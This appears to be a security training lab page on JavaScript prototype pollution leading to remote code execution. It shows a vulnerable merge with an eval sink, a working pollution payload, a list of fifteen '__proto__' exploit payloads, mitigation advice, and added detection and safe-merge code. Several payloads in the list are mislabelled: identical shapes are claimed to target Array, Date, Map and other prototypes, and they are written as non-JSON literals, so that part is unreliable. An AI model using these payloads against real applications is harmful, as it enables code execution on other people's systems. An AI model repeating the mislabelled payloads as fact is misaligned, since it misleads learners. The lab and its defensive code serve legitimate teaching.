Lab 5: Prototype Pollution with RCE

Prototype pollution leading to Remote Code Execution

Difficulty: High

Lab Overview

This lab demonstrates prototype pollution vulnerabilities that can lead to Remote Code Execution (RCE). These attacks exploit prototype pollution to modify function prototypes and execute arbitrary code.

Objective: Understand how prototype pollution can lead to RCE and how to exploit these vulnerabilities.

Vulnerable Application
Code Execution Engine

This application processes code execution requests. Try to exploit prototype pollution vulnerabilities that lead to RCE:

⚠️ RCE Prototype Pollution Warning

This lab demonstrates RCE prototype pollution vulnerabilities:

  • Function Pollution - Function prototype modification
  • Constructor Pollution - Constructor prototype modification
  • Method Pollution - Method prototype modification
  • Code Execution - Arbitrary code execution
RCE Prototype Pollution Demo
JavaScript RCE Prototype Pollution Demonstration:

This demonstrates how prototype pollution can lead to RCE:

  // Vulnerable sink: evaluates whatever string it is handed
  function executeCode(code) {
    return eval(code);
  }

  // Vulnerable recursive merge: it looks keys up by name, so a "__proto__" key in
  // the input resolves to the target's prototype instead of creating an own property
  function merge(target, source) {
    for (const key in source) {
      if (typeof source[key] === "object" && source[key] !== null) {
        if (target[key] === undefined || target[key] === null) target[key] = {};
        merge(target[key], source[key]);
      } else {
        target[key] = source[key];
      }
    }
    return target;
  }

  // Attacker input. JSON.parse stores "__proto__" as an ordinary own key; an object
  // literal with a "__proto__" key would only set that literal's own prototype
  const maliciousInput = JSON.parse(
    '{"__proto__": {"constructor": {"prototype": {"toString": "console.log(\'RCE via prototype pollution!\')"}}}}'
  );

  // Process the malicious input: __proto__ -> Object.prototype, .constructor -> Object,
  // .prototype -> Object.prototype, so Object.prototype.toString is replaced by the string
  merge({}, maliciousInput);

  // Every plain object now inherits the attacker's string as toString; a sink that
  // evaluates it executes the payload
  const obj = {};
  executeCode(obj.toString); // prints: RCE via prototype pollution!
The demo above shows how prototype pollution can lead to RCE through modification of a method on a shared prototype: once the inherited toString is replaced, every object picks it up, and any sink that evaluates it runs the attacker's string. Which prototype a "__proto__" key reaches depends on the object it is merged into: for a plain-object target, "__proto__" resolves to Object.prototype, and "__proto__.constructor.prototype" resolves to Object.prototype as well.
RCE Techniques
Function toString() Pollution

  // Pollute Function.prototype.toString
  { "__proto__": { "constructor": { "prototype": { "toString": function() { return "console.log('RCE!')"; } } } } }

Function valueOf() Pollution

  // Pollute Function.prototype.valueOf
  { "__proto__": { "constructor": { "prototype": { "valueOf": function() { return "console.log('RCE!')"; } } } } }

Array toString() Pollution

  // Pollute Array.prototype.toString
  { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }

Object toString() Pollution

  // Pollute Object.prototype.toString
  { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }

Date toString() Pollution

  // Pollute Date.prototype.toString
  { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }

String toString() Pollution

  // Pollute String.prototype.toString
  { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }
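The payload shapes above all share the same tell: a "__proto__", "constructor" or "prototype" key somewhere in the input. The following is an added example, not part of the lab's own code, showing how a defender can flag those key paths in untrusted JSON before it reaches any merge, and how to parse the same JSON so that the keys are discarded. The function names and the sample payloads are this example's own; the payloads are constructed to mirror the shapes listed in the lab.

```javascript
// Added example (not part of the lab's own code): scan untrusted JSON for the
// key paths that a naive recursive merge would turn into prototype pollution,
// and parse it in a way that drops those keys. Names are this example's own.

const POLLUTION_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walk a parsed JSON value and collect every dotted path that contains a
// pollution key. Object.keys sees only own, enumerable keys, and JSON.parse
// stores "__proto__" as an ordinary own key, so the payload shapes from the
// lab are visited exactly as a vulnerable merge would see them.
function findPollutionPaths(value, path = [], found = []) {
  if (value === null || typeof value !== "object") return found;
  for (const key of Object.keys(value)) {
    const next = path.concat(key);
    if (POLLUTION_KEYS.has(key)) found.push(next.join("."));
    findPollutionPaths(value[key], next, found);
  }
  return found;
}

// Parse untrusted JSON while discarding pollution keys: a reviver that returns
// undefined makes JSON.parse delete that property from its holder.
function parseSafely(text) {
  return JSON.parse(text, (key, value) =>
    POLLUTION_KEYS.has(key) ? undefined : value
  );
}

// Constructed sample inputs mirroring the payload shapes listed in the lab,
// plus one benign document.
const SAMPLE_PAYLOADS = [
  '{"__proto__": {"toString": "console.log(\'RCE!\')"}}',
  '{"__proto__": {"constructor": {"prototype": {"valueOf": "console.log(\'RCE!\')"}}}}',
  '{"name": "benign", "settings": {"theme": "dark"}}',
];

// For each input: what a detector would flag, and which top-level keys survive
// the safe parse. Nothing here assigns to any prototype.
function scanPayloads(payloads) {
  return payloads.map((text) => ({
    flagged: findPollutionPaths(JSON.parse(text)),
    kept: Object.keys(parseSafely(text)),
  }));
}

for (const result of scanPayloads(SAMPLE_PAYLOADS)) {
  console.log(JSON.stringify(result));
}
```

The scanner is the shape to put in request logging or a pre-merge validation step: it reports the full path (for example "__proto__.constructor.prototype"), which is what an analyst wants to see when triaging, and it never assigns into anything, so running it on hostile input is safe. The reviver-based parse is the cheap fix for code that must accept arbitrary JSON but has no business ever seeing those three keys.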
Vulnerability Details
  • Type: RCE Prototype Pollution
  • Severity: Critical
  • Method: Function prototype modification
  • Issue: Arbitrary code execution
RCE Prototype Pollution Examples

Use these techniques to exploit RCE prototype pollution vulnerabilities:

1. Function toString() RCE:
{ "__proto__": { "constructor": { "prototype": { "toString": function() { return "console.log('RCE via Function.toString()!')"; } } } } }
2. Function valueOf() RCE:
{ "__proto__": { "constructor": { "prototype": { "valueOf": function() { return "console.log('RCE via Function.valueOf()!')"; } } } } }
3. Array toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Array.toString()!')"; } } }
4. Object toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Object.toString()!')"; } } }
5. Date toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Date.toString()!')"; } } }
6. String toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via String.toString()!')"; } } }
7. Number toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Number.toString()!')"; } } }
8. Boolean toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Boolean.toString()!')"; } } }
9. RegExp toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via RegExp.toString()!')"; } } }
10. Error toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Error.toString()!')"; } } }
11. Promise toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Promise.toString()!')"; } } }
12. Map toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Map.toString()!')"; } } }
13. Set toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Set.toString()!')"; } } }
14. WeakMap toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via WeakMap.toString()!')"; } } }
15. WeakSet toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via WeakSet.toString()!')"; } } }
Mitigation Strategies
  • Implement comprehensive input validation
  • Use Object.create(null) for safe objects
  • Implement proper input sanitization
  • Use Object.freeze() to prevent modifications
  • Regular security testing and vulnerability assessments
  • Monitor for unusual object behavior
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Implement rate limiting and request validation
  • Educate developers about prototype pollution
  • Use safe parsing libraries
  • Implement proper error handling
  • Use Content Security Policy (CSP)
  • Implement proper logging and monitoring
  • Avoid using eval() and similar functions
  • Implement proper sandboxing
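Several of the items above (input validation, Object.create(null), Object.freeze(), monitoring for unusual object behaviour) fit together into one small defensive layer. The following is an added example, not part of the lab's own code: a deep merge that refuses prototype-reaching keys and builds null-prototype objects, an integrity check that reports any property added to the built-in prototypes the lab's payloads target, and a freeze step for use once the application has finished loading. The function names and the sample input are this example's own.

```javascript
// Added example (not part of the lab's own code): a deep merge that cannot
// climb into a prototype, a runtime integrity check for the prototypes the
// lab's payloads aim at, and a freeze step as a last line of defence.
// Function names and the sample input are this example's own.

const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Merge `source` into `target`. Prototype-reaching keys are rejected outright,
// only own branches of `target` are descended into (never inherited ones), and
// new branches are null-prototype objects, so there is no prototype to pollute.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) {
      throw new Error(`rejected key "${key}" in untrusted input`);
    }
    const value = source[key];
    if (value !== null && typeof value === "object" && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
      const branch = own !== null && typeof own === "object" ? own : Object.create(null);
      target[key] = safeMerge(branch, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// The built-in prototypes the lab's payloads target
const WATCHED = { Object: Object.prototype, Function: Function.prototype, Array: Array.prototype };

// Record the own property names of each watched prototype at startup
function snapshotPrototypes() {
  const snapshot = {};
  for (const [name, proto] of Object.entries(WATCHED)) {
    snapshot[name] = new Set(Reflect.ownKeys(proto).map(String));
  }
  return snapshot;
}

// Report any property added since the snapshot, and any toString that is no
// longer a function (the lab's payloads replace it with a string)
function detectPollution(snapshot) {
  const findings = [];
  for (const [name, proto] of Object.entries(WATCHED)) {
    for (const key of Reflect.ownKeys(proto).map(String)) {
      if (!snapshot[name].has(key)) findings.push(`${name}.prototype.${key}`);
    }
    if (typeof proto.toString !== "function") {
      findings.push(`${name}.prototype.toString is not a function`);
    }
  }
  return findings;
}

// Once the application has finished loading polyfills and the like, freeze the
// watched prototypes so even a vulnerable merge elsewhere cannot add to them
function hardenPrototypes() {
  for (const proto of Object.values(WATCHED)) Object.freeze(proto);
}

// Constructed untrusted input in the lab's payload shape, followed by a benign key
const UNTRUSTED_JSON =
  '{"__proto__": {"toString": "console.log(\'RCE!\')"}, "theme": {"mode": "dark"}}';

// Run the hostile input through safeMerge (it is rejected), then a benign
// document (it merges into null-prototype objects), and confirm nothing leaked
function demo() {
  const baseline = snapshotPrototypes();
  let rejected = null;
  try {
    safeMerge(Object.create(null), JSON.parse(UNTRUSTED_JSON));
  } catch (err) {
    rejected = err.message;
  }
  const benign = safeMerge(Object.create(null), { theme: { mode: "dark" } });
  return { rejected, findings: detectPollution(baseline), benign };
}

console.log(JSON.stringify(demo()));
```

Two design notes. Rejecting the input with an error, rather than silently dropping the key, is deliberate: a request carrying "__proto__" is not a formatting accident, and the error is what gets it into the logs. Object.freeze() on the built-in prototypes is effective but should run only after every library that legitimately patches prototypes (polyfills, some test frameworks) has loaded, otherwise those libraries fail at startup.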